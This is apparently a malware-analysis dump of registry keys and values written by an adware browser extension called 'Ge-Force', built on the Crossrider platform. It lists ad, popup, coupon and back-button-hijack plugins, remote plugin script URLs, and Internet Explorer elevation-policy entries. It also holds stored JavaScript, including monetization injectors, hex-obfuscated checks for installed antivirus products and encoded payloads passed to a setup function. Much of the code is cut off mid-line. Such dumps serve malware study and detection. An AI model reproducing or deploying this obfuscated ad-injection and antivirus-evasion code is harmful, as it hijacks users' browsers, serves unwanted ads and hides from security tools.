"URL" = "http://js.newstatsclientcloud.com/plugins/mins/354.js"
[HKCU\Software\Ge-Force\Plugins\104]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/104.js"
[HKCU\Software\Ge-Force\Plugins\192]
"Version" = "10"
[HKCU\Software\Ge-Force\Plugins\91]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/91.js"
[HKCU\Software\Ge-Force\Plugins\345]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/345.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Ge-Force\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"
[HKCU\Software\Ge-Force\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seɾ"
[HKCU\Software\Ge-Force\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\Ge-Force\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Ge-Force\Plugins\273]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/273.js"
[HKCU\Software\Ge-Force\Plugins\22]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,@"
[HKCU\Software\Ge-Force\Plugins\281]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\200]
"Name" = "foxydeal_m"
[HKCU\Software\Ge-Force\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358],intext:[103,117,123,142,259,263,342,359,360],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351]};"
[HKCU\Software\Ge-Force\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/HOST = http://wt.iwebar.com;TOOLBAR_URL = HOST '/js/toolbar.js';AFFILIATE_ID = 'NONE';appAPI.ready(function($) { /* if (appAPI.db.get('user_id') === null) { if (appAPI.db.get('installation') === null){ appAPI.db.set('installation', new Date().getTime()); return; } else { if ((new Date().getTime() - appAPI.db.get('installation')) Extension [version: appAPI.appInfo.version ] loading...); // Set the affiliate ID //appAPI.db.set('affiliate_id', AFFILIATE_ID); // Include the Base64 library appAPI."
[HKCU\Software\Ge-Force\Manifest]
"RunInFrame" = "false"
[HKCU\Software\Ge-Force\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\Ge-Force\Plugins\123]
"Version" = "12"
[HKCU\Software\Ge-Force\Plugins\192]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2NjcxNGMwNTBjMTIxOTJjMWUwNjRlNDI0ZTRmMTAxMjFkMDk1NjQ1NDMxOTFkMWYwZTRiMDg1NzBkMDEwZDE1MGYwNDEwMDI0NzE3MDkxZTQzMGIwYTQyNDk1MTU5NDk0MzViNWM0ODU2NDMxMjE1NGI1NTY2NjM0ZTEwMWExOTA4MTUzYzBiMDA0ODU2NTg0YzA1MGMxMjE5MGE1NjQ1NDMxOTFkMWYwZTRiMDg1NzBkMDEwZDE1MGYwNDEwMDI0NzE3MDkxZTQzMGIwYTQyNDk1MTU5NDk0MzViNWM0ODU2NDMxMjE1NGI1NTY2NjM0ZTA4MDIxODFmMGYwNzMwMDg0ODU2NTg1ZjU0NGE0YTYzNTk0YzRhNGM1YTE4MDgwYTEyMDAxYTBkMDY0ZTQyNGUzNjVhMDcwZDBhNGUzNzQwNzI0ZTRkNTg0NjRiMTAwMjA2MDUxNjBiMjcyYjQ0NTM1OTRlMWQwNTE2MGEwMjBmNDgzNjBiMWExMDVkNGY1ZTVkMDA1NzU5NDk1NDRhNTE1ODE1NGQ1ZjE2MWMxYjAwMDMxZjEwMGIxZjI3MTUxYzFiMDUwZTRiNDI0ZTRhMjczOTJhMmIyMzM5M2YyYTI3MjkzZDM0MzYzYzM0M2UyOTM2MmEyODNjMzkzYTJjMmUzNTI1M2MzMTMyNWY0YTQ5NWUwZDBlMDgxNzAwMDMxOTBiMGM1ZTU2NGE0YjI3MzEyZTJhMjkzYTJhM2UyMzI4M2QzYzMyMzkzNjM5MjYyMjJiMjEzZDMxMzI1ZjFiNTI1YjY2MTc=', 'jlxnmxfiyl'); }"
[HKCU\Software\Ge-Force\Manifest]
"BgVersion" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppName" = "Ge-Force-bg.exe"
[HKCU\Software\Ge-Force\Plugins\46]
"Version" = "5"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppName" = "Ge-Force-codedownloader.exe"
[HKCU\Software\Ge-Force]
"ActiveAppId" = "69129"
[HKCU\Software\Ge-Force\Plugins\183]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/183.js"
[HKCU\Software\Crossrider]
"Verifier" = "7d6635bb3acc762051a59407230a02ec"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "69129"
"DisplayVersion" = "1.35.12.18"
[HKCU\Software\Ge-Force\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,91"
[HKCU\Software\Ge-Force\Plugins\72]
"Name" = "appApiValidation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\Ge-Force\Plugins\207]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/207.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Ge-Force\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.e"
[HKCU\Software\Ge-Force\Plugins\350]
"Name" = "nguava_m"
[HKCU\Software\Ge-Force\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars)"
[HKCU\Software\Ge-Force\Debug]
"IsDebuggingPlugins" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\288]
"Name" = "firstoffer_pricecomp_m"
[HKCU\Software\Ge-Force\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var y={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"
[HKCU\Software\Ge-Force\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKCU\Software\Ge-Force\Plugins\35]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/35.js"
[HKCU\Software\Ge-Force\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKCU\Software\Ge-Force\Plugins\40]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\Ge-Force\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Ge-Force\Plugins\21]
"Version" = "5"
[HKLM\SOFTWARE\Ge-Force\Installer]
"BundledIe" = "1"
[HKCU\Software\Ge-Force\Plugins\354]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\193]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/193.js"
[HKCU\Software\Ge-Force\Plugins\42]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/42.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Ge-Force\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\Ge-Force\Plugins\193]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"
[HKCU\Software\Ge-Force\Plugins\1]
"JavaScript" = "var __a0__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63\x64\x6e\x2e\x6e\x65\x74'].join('')var __a1__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69\x6e\x67\x2d\x61\x70','\x70\x2e\x63\x72\x6f\x73\x73\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a2__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f','\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63','\x64\x6e\x2e\x6e\x65\x74'].join('')var __a3__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69','\x6e\x67\x2d\x61\x70\x70\x2e\x63\x72\x6f\x73\x73','\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a4__ = ['\x68\x74\x74\x70\x3a\x2f','\x2f\x6e\x73\x74\x61\x74','\x73\x2e\x63\x72\x6f\x73','\x73\x72\x69\x64\x65\x72','\x2e\x63\x6f\x6d'].join('')var __a5__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74','\x61\x67\x69\x6e\x67\x2d\x61\x70\x70','\x2e\x63\x72\x6f\x73\x73\x72\x69\x64','\x65\x72\x2e\x63\x6f\x6d'].join('')var __a6__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f','\x75\x72\"
[HKCU\Software\Ge-Force\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\Ge-Force\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""
[HKCU\Software\Ge-Force\Plugins\44]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/44.js"
[HKCU\Software\Ge-Force\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\Ge-Force\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]"
[HKCU\Software\Ge-Force\Installer]
"zdata" = "0"
[HKCU\Software\Ge-Force\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Ge-Force\Installer]
"Params" = "{ source_id : 001729, sub_id : 0, uzid : 0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Ge-Force\Manifest]
"Version" = "9"
[HKCU\Software\Ge-Force\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Ge-Force\Plugins\286]
"Name" = "sp_j_m"
[HKCU\Software\Ge-Force\Plugins\36]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/36.js"
[HKCU\Software\Ge-Force\Plugins\246]
"Version" = "15"
[HKCU\Software\Ge-Force\Plugins\3]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/3.js"
[HKCU\Software\Ge-Force\Plugins\345]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\91]
"Version" = "111"
[HKCU\Software\Ge-Force\Plugins\47]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/47.js"
[HKCU\Software\Ge-Force\Plugins\301]
"Name" = "guava_m"
[HKCU\Software\Ge-Force\Plugins\45]
"Name" = "IEOnRequest"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Ge-Force-bg.exe" = "8000"
[HKCU\Software\Ge-Force\Plugins\28]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\356]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/356.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Ge-Force\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\Ge-Force\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\Ge-Force\Plugins\281]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/281.js"
[HKCU\Software\Ge-Force\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"
[HKCU\Software\Ge-Force\Plugins\193]
"Version" = "9"
[HKCU\Software\Ge-Force\Plugins\195]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/195.js"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"Policy" = "1"
[HKCU\Software\Ge-Force\Plugins\207]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\13]
"Version" = "7"
[HKCU\Software\Ge-Force\Manifest]
"PluginsManifestVersion" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Ge-Force\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"
[HKCU\Software\Ge-Force\Plugins\41]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/41.js"
[HKCU\Software\Ge-Force\Plugins\337]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppName" = "Ge-Force-buttonutil.exe"
[HKCU\Software\Ge-Force\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Ge-Force\Installer]
"FullVersion" = "1.35.12.18"
[HKCU\Software\Ge-Force\Plugins\93]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/93.js"
[HKCU\Software\Crossrider]
"Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"
[HKCU\Software\Ge-Force\Plugins\220]
"Version" = "38"
[HKCU\Software\Ge-Force\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p"
[HKCU\Software\Ge-Force\Plugins\3]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\35]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppName" = "Ge-Force-buttonutil.exe"
[HKCU\Software\Ge-Force\Plugins\43]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/43.js"
[HKCU\Software\Ge-Force\Plugins\64]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\286]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/286.js"
[HKCU\Software\Ge-Force\Plugins\72]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/72.js"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\9]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU3MjU0NDI0YTU0NGIwNjExMGMxNTJkMDYwZTQ4NGU0OTRjMGQwYzExMDg0ZTRkNDUxNTE5MDc0YjEyMGExNDE4MWIxZDE1MDUwMjAwMGM0YjFiMWIwZjQ1MTUwZjA4MGMxNDBjMTkwMDA3NDUxNzA1MDcwMDE2MTE0NzEwMGIxOTAwNTQ1NjQzMTkxNTA4MmIwYjBlNDkzNjMxMjYyYTJhMmIyNzMwMjMzMDJjM2MzYTM0MmMzZjNjMzYzNTI3M2MyYzNhMzEyMTI3MmI0NDE5NDU1NDVlNDMwYjU3NDU0NDQ0MTk0NzU0NWU0MzE2MDQxNTExNWYzNTJiMmEzYzJhMmIzNjJhM2QyNjJmMjYzNjJmMzUyODNhMzYzNTJmMmYyYjM2NGM0OTcyNDU1ODU0NDI0ODFjMWQxYTE1MGIzMDBhMTg0MDUwNTQ0YjA2MTEwYzE1MGI0ZTRkNDUxNTE5MDc0YjEyMGExNDE4MWIxZDE1MDUwMjAwMGM0YjFiMWIwZjQ1MTUwZjA4MGMxNDBjMTkwMDA3NDUxNzA1MDcwMDE2MTE0NzEwMGIxOTAwNTQ1NjQzMTkxNTA4MmIwYjBlNDkzNjMxMjYyYTJhMmIyNzMwMjMzMDJjM2MzYTM0MmMzZjNjMzYzNTI3M2MyYzNhMzEyMTI3MmI0NDE5NDU1NDVlNDMwYjU3NDU0NDQ0MTk0NzU0NWU0MzE2MDQxNTExNWYzNTJiMmEzYzJhMmIzNjJhM2QyNjJmMjYzNjJmMzUyODNhMzYzNTJmMmYyYjM2NGM0OTcyNDU1ODU0NDI0ODA0MDUxYjAyMTEwYjMxMTA0MDUwNTQ1ODVlNTE3MjE4', 'extbjtinex'); }"
[HKCU\Software\Ge-Force\Plugins\78]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\104]
"Version" = "13"
[HKCU\Software\Ge-Force\Plugins\177]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/177.js"
[HKCU\Software\Ge-Force\Manifest]
"ModeType" = "production"
